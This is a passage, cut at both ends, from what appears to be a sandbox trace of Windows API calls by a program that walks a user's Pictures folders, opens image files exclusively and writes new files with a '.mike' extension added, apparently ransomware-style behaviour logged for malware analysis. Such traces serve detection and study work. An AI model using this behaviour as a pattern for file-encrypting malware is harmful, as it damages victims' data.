ftCreationTime.dwHighDateTime=0x1d4c8da, ftLastAccessTime.dwLowDateTime=0x9eea0790, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x9eea0790, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0xddd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MHSnIf00DQKvE2e u0UQ.gif", cAlternateFileName="MHSNIF~1.GIF")) returned 1 [0154.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c06b60, ftCreationTime.dwHighDateTime=0x1d4ca3b, ftLastAccessTime.dwLowDateTime=0x559d6a60, ftLastAccessTime.dwHighDateTime=0x1d4c9cf, ftLastWriteTime.dwLowDateTime=0x559d6a60, ftLastWriteTime.dwHighDateTime=0x1d4c9cf, nFileSizeHigh=0x0, nFileSizeLow=0xe5e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="moW9-Sh.bmp", cAlternateFileName="")) returned 1 [0154.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x712fd260, ftCreationTime.dwHighDateTime=0x1d4d044, ftLastAccessTime.dwLowDateTime=0x466d8320, ftLastAccessTime.dwHighDateTime=0x1d4d291, ftLastWriteTime.dwLowDateTime=0x466d8320, ftLastWriteTime.dwHighDateTime=0x1d4d291, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wROOf2dw16y", cAlternateFileName="WROOF2~1")) returned 1 [0154.912] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.912] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0154.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0154.912] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX", lpFilePart=0x0) returned 0x62 [0154.912] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.912] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.912] CoTaskMemFree (pv=0x508980) [0154.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.912] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX", lpFilePart=0x0) returned 0x62 [0154.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0154.913] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX", lpFilePart=0x0) returned 0x62 [0154.913] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\", lpFilePart=0x0) returned 0x63 [0154.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c7ea0, ftCreationTime.dwHighDateTime=0x1d4d451, ftLastAccessTime.dwLowDateTime=0x61832580, ftLastAccessTime.dwHighDateTime=0x1d4cffc, ftLastWriteTime.dwLowDateTime=0x61832580, ftLastWriteTime.dwHighDateTime=0x1d4cffc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0154.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c7ea0, ftCreationTime.dwHighDateTime=0x1d4d451, ftLastAccessTime.dwLowDateTime=0x61832580, ftLastAccessTime.dwHighDateTime=0x1d4cffc, ftLastWriteTime.dwLowDateTime=0x61832580, ftLastWriteTime.dwHighDateTime=0x1d4cffc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957ab650, ftCreationTime.dwHighDateTime=0x1d4ce80, ftLastAccessTime.dwLowDateTime=0x608a2970, ftLastAccessTime.dwHighDateTime=0x1d4c68e, ftLastWriteTime.dwLowDateTime=0x608a2970, ftLastWriteTime.dwHighDateTime=0x1d4c68e, nFileSizeHigh=0x0, nFileSizeLow=0x8866, dwReserved0=0x0, dwReserved1=0x0, cFileName="aPoAj8.gif", cAlternateFileName="")) returned 1 [0154.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9783ad40, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0xe9c331f0, ftLastAccessTime.dwHighDateTime=0x1d4d584, ftLastWriteTime.dwLowDateTime=0xe9c331f0, ftLastWriteTime.dwHighDateTime=0x1d4d584, nFileSizeHigh=0x0, nFileSizeLow=0x145b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="gYO-l-JpXBy3mKQ.png", cAlternateFileName="GYO-L-~1.PNG")) returned 1 [0154.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x154d390, ftCreationTime.dwHighDateTime=0x1d4c640, ftLastAccessTime.dwLowDateTime=0x72038b90, ftLastAccessTime.dwHighDateTime=0x1d4c93d, ftLastWriteTime.dwLowDateTime=0x72038b90, ftLastWriteTime.dwHighDateTime=0x1d4c93d, nFileSizeHigh=0x0, nFileSizeLow=0xd0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="hZ-hjkfwHXSm6n.bmp", cAlternateFileName="HZ-HJK~1.BMP")) returned 1 [0154.913] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c6abc0, ftCreationTime.dwHighDateTime=0x1d4d595, ftLastAccessTime.dwLowDateTime=0x57442b70, ftLastAccessTime.dwHighDateTime=0x1d4c9a1, ftLastWriteTime.dwLowDateTime=0x57442b70, ftLastWriteTime.dwHighDateTime=0x1d4c9a1, nFileSizeHigh=0x0, nFileSizeLow=0x17f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="yQREJ0DYQ_biQRQz.png", cAlternateFileName="YQREJ0~1.PNG")) returned 1 [0154.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf85fc020, ftCreationTime.dwHighDateTime=0x1d4d223, ftLastAccessTime.dwLowDateTime=0xf81a1a50, ftLastAccessTime.dwHighDateTime=0x1d4ccee, ftLastWriteTime.dwLowDateTime=0xf81a1a50, ftLastWriteTime.dwHighDateTime=0x1d4ccee, nFileSizeHigh=0x0, nFileSizeLow=0x131e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="YvTnZ3SulGu.png", cAlternateFileName="YVTNZ3~1.PNG")) returned 1 [0154.914] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.914] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0154.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0154.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\aPoAj8.gif", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\aPoAj8.gif", lpFilePart=0x0) returned 0x6d [0154.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0154.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.914] GetFileType (hFile=0x1c8) returned 0x1 [0154.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0154.915] GetFileType (hFile=0x1c8) returned 0x1 [0154.915] CloseHandle (hObject=0x1c8) returned 1 [0154.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.915] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0154.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0154.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0154.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), fInfoLevelId=0x0, lpFileInformation=0x22bd2b0 | out: lpFileInformation=0x22bd2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9783ad40, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0xe9c331f0, ftLastAccessTime.dwHighDateTime=0x1d4d584, ftLastWriteTime.dwLowDateTime=0xe9c331f0, ftLastWriteTime.dwHighDateTime=0x1d4d584, nFileSizeHigh=0x0, nFileSizeLow=0x145b7)) returned 1 [0154.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), fInfoLevelId=0x0, lpFileInformation=0x22bd698 | out: lpFileInformation=0x22bd698*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9783ad40, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0xe9c331f0, ftLastAccessTime.dwHighDateTime=0x1d4d584, ftLastWriteTime.dwLowDateTime=0xe9c331f0, ftLastWriteTime.dwHighDateTime=0x1d4d584, nFileSizeHigh=0x0, nFileSizeLow=0x145b7)) returned 1 [0154.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0154.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0154.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0154.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.917] GetFileType (hFile=0x1c8) returned 0x1 [0154.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.917] GetFileType (hFile=0x1c8) returned 0x1 [0154.917] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0154.917] WriteFile (in: hFile=0x1c8, lpBuffer=0x22bea80*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22bea80*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0154.918] CloseHandle (hObject=0x1c8) returned 1 [0154.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0154.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), fInfoLevelId=0x0, lpFileInformation=0x22be44c | out: lpFileInformation=0x22be44c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9783ad40, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0xe9c331f0, ftLastAccessTime.dwHighDateTime=0x1d4d584, ftLastWriteTime.dwLowDateTime=0xe9c331f0, ftLastWriteTime.dwHighDateTime=0x1d4d584, nFileSizeHigh=0x0, nFileSizeLow=0x145b7)) returned 1 [0154.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0154.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 